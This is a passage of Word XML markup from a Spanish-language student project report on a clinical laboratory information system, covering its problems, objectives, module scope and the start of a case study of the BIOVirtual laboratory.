    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso Analítico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Los Laboratorios Clínicos no cuentan con la tecnología suficiente en el desarrollo de software con respecto a la comunicación entre todos los del plantel médico para una atención más personalizada a cada paciente y coordinación entre todos para organizar y distribuir en forma eficiente su carga de trabajo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Teniendo en un sistema implementado ciertos modelos de investigación y seguimiento de pacientes por grupos a través de los protocolos por especialidad para que la persona que sea atendida tenga en si una mayor calidad de atención con respecto a sus análisis entregados al Laboratorio Clínico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La falta de conexión vía un Sistema de Información de cada uno de los resultados de cada paciente puede ser recogido en cualquier sucursal que tenga le Laboratorio Clínico.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mediante una opción de órdenes de pruebas de laboratorio en una aplicación clínica integral que el paciente tiene sus resultados de sus análisis en línea y a su vez se comunica bidireccionalmente con el Sistema de Información Clínico atreves de sus distintas sucursales.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Un sistema de información para un Laboratorio Clínico ideal de ordenes electrónica debería ayudar y guiar al clínico en el proceso de petición sugiriendo las pruebas a pedir en función del paciente y su proceso patológico, ofreciendo toda la información sobre las pruebas disponibles, avisando de posibles peticiones incongruentes o redundantes, informando de dónde y cuándo se puede obtener la muestra o si el paciente requiere una preparación especial.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Proceso Post-Analítico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Por más que los parámetros establecidos en los Laboratorios Clínicos al momento de la entrega de resultados a partir de las muestras tomadas a cada paciente, es en sí eficiente, pero si el Laboratorio Clínico contara con un Sistema implementado a medida, se tendría aun mayor eficiencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La optimización del acceso a la información de todos los pacientes registrados en el sistema del Laboratorio Clínico para reducir el tiempo de respuesta a los pacientes con su información haciéndolo de manera confiable y verídica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>La obtención de cualquier tipo de reporte necesario para el Laboratorio Clínico de una forma automatizada haría una mayor eficiencia en el momento de querer hacer una auditoria o el registro de algún paciente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>El uso de una página web para la publicación de los resultados de los pacientes una vez cancelado su cuenta correspondiente de su análisis haría que tanto el sistema de información que tenga el laboratorio clínico, interactúe con el paciente. Dando una mayor comodidad al paciente y haciendo que tenga mayor preferencia con otros Laboratorios Clínicos del mercado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00BD6D33" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc454371285"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Situación deseada</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00BD6D33" w:rsidP="00ED68D7">
      <w:r w:rsidRPr="00BD6D33">
        <w:t>Desarrollar un sistema de información ayudan en los aspectos pre analíticos (solicitud, cita, obtención de muestras, preparación, fraccionamiento y distribución), en los aspectos analíticos (procesamiento, control de calidad, y en los aspectos pos analíticos (validación clínica, edición de informes, distribución, archivo de muestras). Además, el sistema de información debe contemplar aspectos de los laboratorios con funcionalidades y requerimientos específicos como las urgencias, la genética, los análisis junto al paciente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc454371286"/>
      <w:r>
        <w:t>Objetivos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc454371287"/>
      <w:r>
        <w:t>Objetivo General</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00BD6D33" w:rsidRPr="00BD6D33" w:rsidRDefault="007E33FE" w:rsidP="00BD6D33">
      <w:r>
        <w:t>Desarrollar</w:t>
      </w:r>
      <w:r w:rsidR="00BD6D33" w:rsidRPr="00BD6D33">
        <w:t xml:space="preserve"> un sistema de información para gestionar pacientes, plantel médico, administrativo y análisis en laboratorios clínicos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc454371288"/>
      <w:r>
        <w:t>Objetivo</w:t>
      </w:r>
      <w:r w:rsidR="007E33FE">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Específicos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recopilar información de las actividades realizada en los laboratorios clínicos, mediante entrevistas estructuradas para la implementación del sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analizar los procesos que intervienen en el manejo del paciente, registro del plantel médico (personal del laboratorio) y análisis, para determinar los requisitos funcionales del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Diseñar la estructura de la base de datos a través de una herramienta de modelado, para mejorar el manejo de información.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implementar el sistema utilizando una herramienta CASE, siguiendo el concepto de MDA. Además de la creación de una página web para dar a conocer el software y publicar los servicios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00954840">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Realizar pruebas del sistema de información, para verificar que cumpla con las exigencias especificadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00B27B46" w:rsidRPr="007E33FE" w:rsidRDefault="00B27B46" w:rsidP="00B27B46"/>
    <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc454371289"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Alcance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>El sistema tiene como objetivo gestionar la información que se maneja en un laboratorio clínico, desde el momento que el paciente llega a la recepción del Laboratorio Clínico, la obtención de muestras y la entrega de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc454371290"/>
      <w:r>
        <w:t>Módulo Pacientes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permite captar la información administrativa del paciente y su respectivo almacenamiento, para tenerlos disponibles en línea y llevar a cabo estudios complementarios, revisar la congruencia de los resultados y realizar recomendaciones desde el laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar Recepción de paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permite captar datos demográficos para el registro del paciente, estos son los que identifican inequívocamente al paciente y lo relacionan con otros datos. Por ejemplo, nombre, apellidos, teléfono, dirección, número de seguro social, entre otros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar Análisis del Paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permite seguir el movimiento de las muestras para su respectivo análisis solicitado por el paciente, desde su obtención hasta la verificación de los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc454371291"/>
      <w:r>
        <w:t>Módulo Movimientos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>El profesional encargado del Laboratorio Clínico ingresará los datos obtenidos del análisis de las muestras.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc454371292"/>
      <w:r>
        <w:t>Módulo Maestro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t xml:space="preserve">Se realizará el control del personal del laboratorio, gestión de las empresas aseguradoras, usuarios que interactuaran con el sistema y sus respectivos privilegios. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar plantel médico </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá el registro de todo el plantel medico con todas sus características y especialidades, en qué departamento está asignado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar Usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permite registrar los distintos tipos de usuarios que interactúan con el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar Grupos </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá el registro de los distintos tipos de cargos asignados en Grupos que puede tener en el Laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar Pacientes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá la búsqueda y modificación de datos de todos los pacientes registrados en el Laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar Empleado </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá el registro de los todos los empleados que trabajaran en el Laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar privilegios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t xml:space="preserve">Permite controlar el acceso a los distintos módulos del sistema, considerando privilegios globales o individuales. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc454371293"/>
      <w:r>
        <w:t>Módulo Análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>En este módulo se gestionará los análisis que ofrece el laboratorio clínico, los precios y la validación de los resultados según la Parametrización correspondiente del reactivo utilizado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar Análisis </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Se administrará los análisis que ofrece el laboratorio, sus respectivos precios y muestras para el mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar tipos de muestras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá registrar todos los distintos tipos de muestras necesarios para la realización de los análisis que el laboratorio ofrece o esté en condiciones de realizar, así como el costo de cada uno de estas pruebas y el tiempo promedio de duración.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar métodos de extracción </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá registrar todos los distintos tipos de métodos de extracción ya sea necesarios para la realización de los análisis que el laboratorio ofrece o esté en condiciones de realizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestionar campo analítico  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá registrar todos los distintos campos en los cuales se puede agregar nuevos análisis a la lista del mismo laboratorio</w:t>
      </w:r>
      <w:r w:rsidR="00D11E70">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="00D11E70" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Gestionar p</w:t>
      </w:r>
      <w:r w:rsidR="007E33FE">
        <w:t xml:space="preserve">arametrización de análisis </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E33FE" w:rsidRDefault="007E33FE" w:rsidP="007E33FE">
      <w:r>
        <w:t>Permitirá asociar los resultados obtenidos de la prueba y verificar que estos dentro de los rangos normales y la validación por</w:t>
      </w:r>
      <w:r w:rsidR="00D11E70">
        <w:t xml:space="preserve"> tipo de análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00B27B46" w:rsidRPr="007E33FE" w:rsidRDefault="00B27B46" w:rsidP="007E33FE"/>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D11E70" w:rsidRDefault="00D11E70" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc454371294"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Laboratorios Clínicos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc414243686"/>
      <w:bookmarkStart w:id="16" w:name="_Toc414318660"/>
      <w:bookmarkStart w:id="17" w:name="_Toc422314636"/>
      <w:bookmarkStart w:id="18" w:name="_Toc454371295"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Casos d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e Estudio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00CF0096" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc414243687"/>
      <w:bookmarkStart w:id="20" w:name="_Toc414318661"/>
      <w:bookmarkStart w:id="21" w:name="_Toc422314637"/>
      <w:bookmarkStart w:id="22" w:name="_Toc454371296"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso d</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e Estudio #01</w:t>
      </w:r>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: “Laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BIOVirtual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277259" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="185B6D0C" wp14:editId="067331B7">
            <wp:extent cx="3976678" cy="1064526"/>
            <wp:effectExtent l="19050" t="0" r="24130" b="345440"/>
            <wp:docPr id="2" name="Imagen 2" descr="C:\Users\user\Desktop\Logotipo BIOVir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Logotipo BIOVirtu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9735" cy="10733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277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El laboratorio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>BIOVirtual</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> está ubicado en la Calle España Nº 548 y cuenta con una sucursal en el 3er Anillo Externo Nº 97 detrás del Zoológico, su horario de atención es de 8:30 a 19:00 </w:t>
      </w:r>
      <w:r w:rsidR="00CF0096" w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>horas</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y su página web es: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E25404">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:i/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>www.biovirtual.com.bo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00277259" w:rsidRPr="00BB4EFA" w:rsidRDefault="00277259" w:rsidP="00277259">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4EFA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
